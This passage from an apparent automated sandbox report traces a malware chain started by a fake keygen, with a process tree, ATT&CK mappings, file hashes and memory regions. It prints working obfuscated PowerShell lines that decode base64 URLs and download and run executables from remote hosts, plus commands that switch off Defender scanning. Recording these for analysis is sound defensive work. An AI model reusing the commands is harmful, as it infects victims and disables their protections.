[char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3748
                • C:\Users\Public\wpe.exe
                  "C:\Users\Public\wpe.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Modifies registry class
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4976
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                    6⤵
                      PID:3752
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4344
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                          8⤵
                            PID:2736
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                              "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                              9⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2212
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                10⤵
                                • Executes dropped EXE
                                PID:3864
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                10⤵
                                • Executes dropped EXE
                                PID:3936
                          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                            8⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:1236
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /pid 1236 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\960730520344061\\* & exit
                              9⤵
                                PID:4628
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /pid 1236
                                  10⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4380
                        • C:\Users\Public\wpe.exe
                          "C:\Users\Public\wpe.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:4244
                        • C:\Users\Public\wpe.exe
                          "C:\Users\Public\wpe.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:5084
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2233.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1584
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1656
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 2
                    3⤵
                    • Delays execution with timeout.exe
                    PID:1312
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2233.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4336
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4436
                      • C:\Users\Public\ydh.exe
                        "C:\Users\Public\ydh.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:4756
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:1948
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:3844
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /pid 3844 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\451173103334301\\* & exit
                              8⤵
                                PID:1432
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /pid 3844
                                  9⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4864
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:3876
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:4900
                          • C:\Users\Public\ydh.exe
                            "C:\Users\Public\ydh.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:4952
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2233.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4424
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4564
                • C:\Windows\SysWOW64\DllHost.exe
                  C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  1⤵
                    PID:4148
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c start C:\Windows\temp\g5eauhxt.exe
                      2⤵
                        PID:2308
                        • C:\Windows\temp\g5eauhxt.exe
                          C:\Windows\temp\g5eauhxt.exe
                          3⤵
                          • Executes dropped EXE
                          PID:4712
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "powershell" Get-MpPreference -verbose
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4716
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1464
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                            4⤵
                              PID:4640
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                              4⤵
                                PID:2784
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                4⤵
                                  PID:3664
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                  4⤵
                                    PID:5024
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /IM cmstp.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4684

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Persistence

                            Modify Existing Service

                            1
                            T1031

                            Defense Evasion

                            Modify Registry

                            2
                            T1112

                            Disabling Security Tools

                            2
                            T1089

                            Credential Access

                            Credentials in Files

                            3
                            T1081

                            Discovery

                            Query Registry

                            2
                            T1012

                            System Information Discovery

                            2
                            T1082

                            Collection

                            Data from Local System

                            3
                            T1005

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\ProgramData\freebl3.dll
                            • C:\ProgramData\freebl3.dll
                            • C:\ProgramData\mozglue.dll
                            • C:\ProgramData\mozglue.dll
                            • C:\ProgramData\msvcp140.dll
                            • C:\ProgramData\msvcp140.dll
                            • C:\ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • C:\ProgramData\softokn3.dll
                            • C:\ProgramData\softokn3.dll
                            • C:\ProgramData\sqlite3.dll
                            • C:\ProgramData\sqlite3.dll
                            • C:\ProgramData\vcruntime140.dll
                            • C:\ProgramData\vcruntime140.dll
                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Temp\2233.tmp\Keygen.exe
                            • C:\Users\Admin\AppData\Local\Temp\2233.tmp\Keygen.exe
                            • C:\Users\Admin\AppData\Local\Temp\2233.tmp\b.hta
                            • C:\Users\Admin\AppData\Local\Temp\2233.tmp\b1.hta
                            • C:\Users\Admin\AppData\Local\Temp\2233.tmp\ba.hta
                            • C:\Users\Admin\AppData\Local\Temp\2233.tmp\ba1.hta
                            • C:\Users\Admin\AppData\Local\Temp\2233.tmp\m.hta
                            • C:\Users\Admin\AppData\Local\Temp\2233.tmp\m1.hta
                            • C:\Users\Admin\AppData\Local\Temp\2233.tmp\start.bat
                            • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\JDI8pfhw4m.exe
                            • C:\Users\Admin\AppData\Local\Temp\JDI8pfhw4m.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Local\Temp\qEAK8mYfTf.exe
                            • C:\Users\Admin\AppData\Local\Temp\qEAK8mYfTf.exe
                            • C:\Users\Admin\AppData\Local\Temp\rlgeQg7oxE.exe
                              MD5

                              013db621a3351e3fb049efd2ccad79ff

                              SHA1

                              a23394ea54dbc5342a77938a2c285ee616185560

                              SHA256

                              df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                              SHA512

                              1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                            • C:\Users\Admin\AppData\Local\Temp\sY4V3ugIn1.exe
                            • C:\Users\Admin\AppData\Local\Temp\sY4V3ugIn1.exe
                            • C:\Users\Public\bud.exe
                            • C:\Users\Public\bud.exe
                            • C:\Users\Public\bud.exe
                            • C:\Users\Public\wpe.exe
                            • C:\Users\Public\wpe.exe
                            • C:\Users\Public\wpe.exe
                            • C:\Users\Public\wpe.exe
                            • C:\Users\Public\ydh.exe
                            • C:\Users\Public\ydh.exe
                            • C:\Users\Public\ydh.exe
                            • C:\Windows\Temp\g5eauhxt.exe
                              MD5

                              f4b5c1ebf4966256f52c4c4ceae87fb1

                              SHA1

                              ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                              SHA256

                              88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                              SHA512

                              02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                            • C:\Windows\temp\cznstw0o.inf
                            • C:\Windows\temp\g5eauhxt.exe
                              MD5

                              f4b5c1ebf4966256f52c4c4ceae87fb1

                              SHA1

                              ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                              SHA256

                              88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                              SHA512

                              02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                            • \ProgramData\mozglue.dll
                            • \ProgramData\mozglue.dll
                            • \ProgramData\mozglue.dll
                            • \ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • \ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • \ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • \ProgramData\sqlite3.dll
                            • \ProgramData\sqlite3.dll
                            • \ProgramData\sqlite3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                              MD5

                              02cc7b8ee30056d5912de54f1bdfc219

                              SHA1

                              a6923da95705fb81e368ae48f93d28522ef552fb

                              SHA256

                              1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                              SHA512

                              0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                            • \Users\Admin\AppData\LocalLow\sqlite3.dll
                            • memory/612-229-0x0000000000000000-mapping.dmp
                            • memory/1032-0-0x0000000000000000-mapping.dmp
                            • memory/1236-240-0x0000000000417A8B-mapping.dmp
                            • memory/1236-242-0x0000000000400000-0x0000000000434000-memory.dmp
                              Filesize

                              208KB

                            • memory/1236-239-0x0000000000400000-0x0000000000434000-memory.dmp
                              Filesize

                              208KB

                            • memory/1312-22-0x0000000000000000-mapping.dmp
                            • memory/1432-230-0x0000000000000000-mapping.dmp
                            • memory/1464-366-0x0000000000000000-mapping.dmp
                            • memory/1464-371-0x00007FFED1450000-0x00007FFED1E3C000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/1584-21-0x0000000000000000-mapping.dmp
                            • memory/1600-3-0x0000000000000000-mapping.dmp
                            • memory/1600-2-0x0000000000000000-mapping.dmp
                            • memory/1656-26-0x0000000000000000-mapping.dmp
                            • memory/1656-30-0x0000000070010000-0x00000000706FE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/1664-285-0x0000000000000000-mapping.dmp
                            • memory/1744-231-0x0000000000000000-mapping.dmp
                            • memory/1948-161-0x0000000000000000-mapping.dmp
                            • memory/2060-7-0x0000000000000000-mapping.dmp
                            • memory/2184-9-0x0000000000000000-mapping.dmp
                            • memory/2212-261-0x0000000003060000-0x0000000003084000-memory.dmp
                              Filesize

                              144KB

                            • memory/2212-244-0x0000000000000000-mapping.dmp
                            • memory/2212-246-0x0000000072410000-0x0000000072AFE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/2212-247-0x0000000000EB0000-0x0000000000EB1000-memory.dmp
                              Filesize

                              4KB

                            • memory/2212-249-0x00000000015B0000-0x00000000015B1000-memory.dmp
                              Filesize

                              4KB

                            • memory/2220-10-0x0000000000000000-mapping.dmp
                            • memory/2228-311-0x0000000000000000-mapping.dmp
                            • memory/2228-317-0x0000000004800000-0x0000000004801000-memory.dmp
                              Filesize

                              4KB

                            • memory/2308-323-0x0000000000000000-mapping.dmp
                            • memory/2664-301-0x0000000005450000-0x0000000005451000-memory.dmp
                              Filesize

                              4KB

                            • memory/2664-310-0x000000000B1D0000-0x000000000B1D5000-memory.dmp
                              Filesize

                              20KB

                            • memory/2664-296-0x0000000000CC0000-0x0000000000CC1000-memory.dmp
                              Filesize

                              4KB

                            • memory/2664-288-0x0000000000000000-mapping.dmp
                            • memory/2664-291-0x0000000071860000-0x0000000071F4E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/2664-305-0x000000000B0F0000-0x000000000B102000-memory.dmp
                              Filesize

                              72KB

                            • memory/2736-236-0x0000000000000000-mapping.dmp
                            • memory/2784-369-0x0000000000000000-mapping.dmp
                            • memory/2800-27-0x00000000072E0000-0x00000000072E1000-memory.dmp
                              Filesize

                              4KB

                            • memory/2800-12-0x0000000000000000-mapping.dmp
                            • memory/2800-18-0x0000000006CD0000-0x0000000006CD1000-memory.dmp
                              Filesize

                              4KB

                            • memory/2800-49-0x0000000007C10000-0x0000000007C11000-memory.dmp
                              Filesize

                              4KB

                            • memory/2800-14-0x0000000070010000-0x00000000706FE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/2956-17-0x0000000000000000-mapping.dmp
                            • memory/3328-356-0x0000000009580000-0x0000000009581000-memory.dmp
                              Filesize

                              4KB

                            • memory/3328-322-0x0000000071860000-0x0000000071F4E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/3328-321-0x0000000000000000-mapping.dmp
                            • memory/3328-329-0x0000000007B20000-0x0000000007B21000-memory.dmp
                              Filesize

                              4KB

                            • memory/3328-342-0x0000000008650000-0x0000000008651000-memory.dmp
                              Filesize

                              4KB

                            • memory/3328-347-0x0000000009450000-0x0000000009483000-memory.dmp
                              Filesize

                              204KB

                            • memory/3328-354-0x0000000009410000-0x0000000009411000-memory.dmp
                              Filesize

                              4KB

                            • memory/3664-372-0x0000000000000000-mapping.dmp
                            • memory/3748-96-0x0000000009410000-0x0000000009411000-memory.dmp
                              Filesize

                              4KB

                            • memory/3748-25-0x0000000000000000-mapping.dmp
                            • memory/3748-97-0x000000000A7D0000-0x000000000A7D1000-memory.dmp
                              Filesize

                              4KB

                            • memory/3748-29-0x0000000070010000-0x00000000706FE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/3748-95-0x0000000009B50000-0x0000000009B51000-memory.dmp
                              Filesize

                              4KB

                            • memory/3752-200-0x0000000000000000-mapping.dmp
                            • memory/3756-319-0x0000000005040000-0x0000000005043000-memory.dmp
                              Filesize

                              12KB

                            • memory/3756-292-0x0000000000000000-mapping.dmp
                            • memory/3756-299-0x0000000000690000-0x0000000000691000-memory.dmp
                              Filesize

                              4KB

                            • memory/3756-308-0x00000000028F0000-0x0000000002901000-memory.dmp
                              Filesize

                              68KB

                            • memory/3756-302-0x0000000000D90000-0x0000000000D91000-memory.dmp
                              Filesize

                              4KB

                            • memory/3756-297-0x0000000071860000-0x0000000071F4E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/3844-172-0x0000000000417A8B-mapping.dmp
                            • memory/3844-178-0x0000000000400000-0x0000000000439000-memory.dmp
                              Filesize

                              228KB

                            • memory/3848-36-0x0000000007C10000-0x0000000007C11000-memory.dmp
                              Filesize

                              4KB

                            • memory/3848-53-0x0000000008560000-0x0000000008561000-memory.dmp
                              Filesize

                              4KB

                            • memory/3848-81-0x0000000009170000-0x0000000009171000-memory.dmp
                              Filesize

                              4KB

                            • memory/3848-78-0x0000000009BD0000-0x0000000009BD1000-memory.dmp
                              Filesize

                              4KB

                            • memory/3848-59-0x0000000008400000-0x0000000008401000-memory.dmp
                              Filesize

                              4KB

                            • memory/3848-23-0x0000000007390000-0x0000000007391000-memory.dmp
                              Filesize

                              4KB

                            • memory/3848-34-0x0000000007A30000-0x0000000007A31000-memory.dmp
                              Filesize

                              4KB

                            • memory/3848-39-0x0000000007CC0000-0x0000000007CC1000-memory.dmp
                              Filesize

                              4KB

                            • memory/3848-15-0x0000000070010000-0x00000000706FE000-memory.dmp
                              Filesize

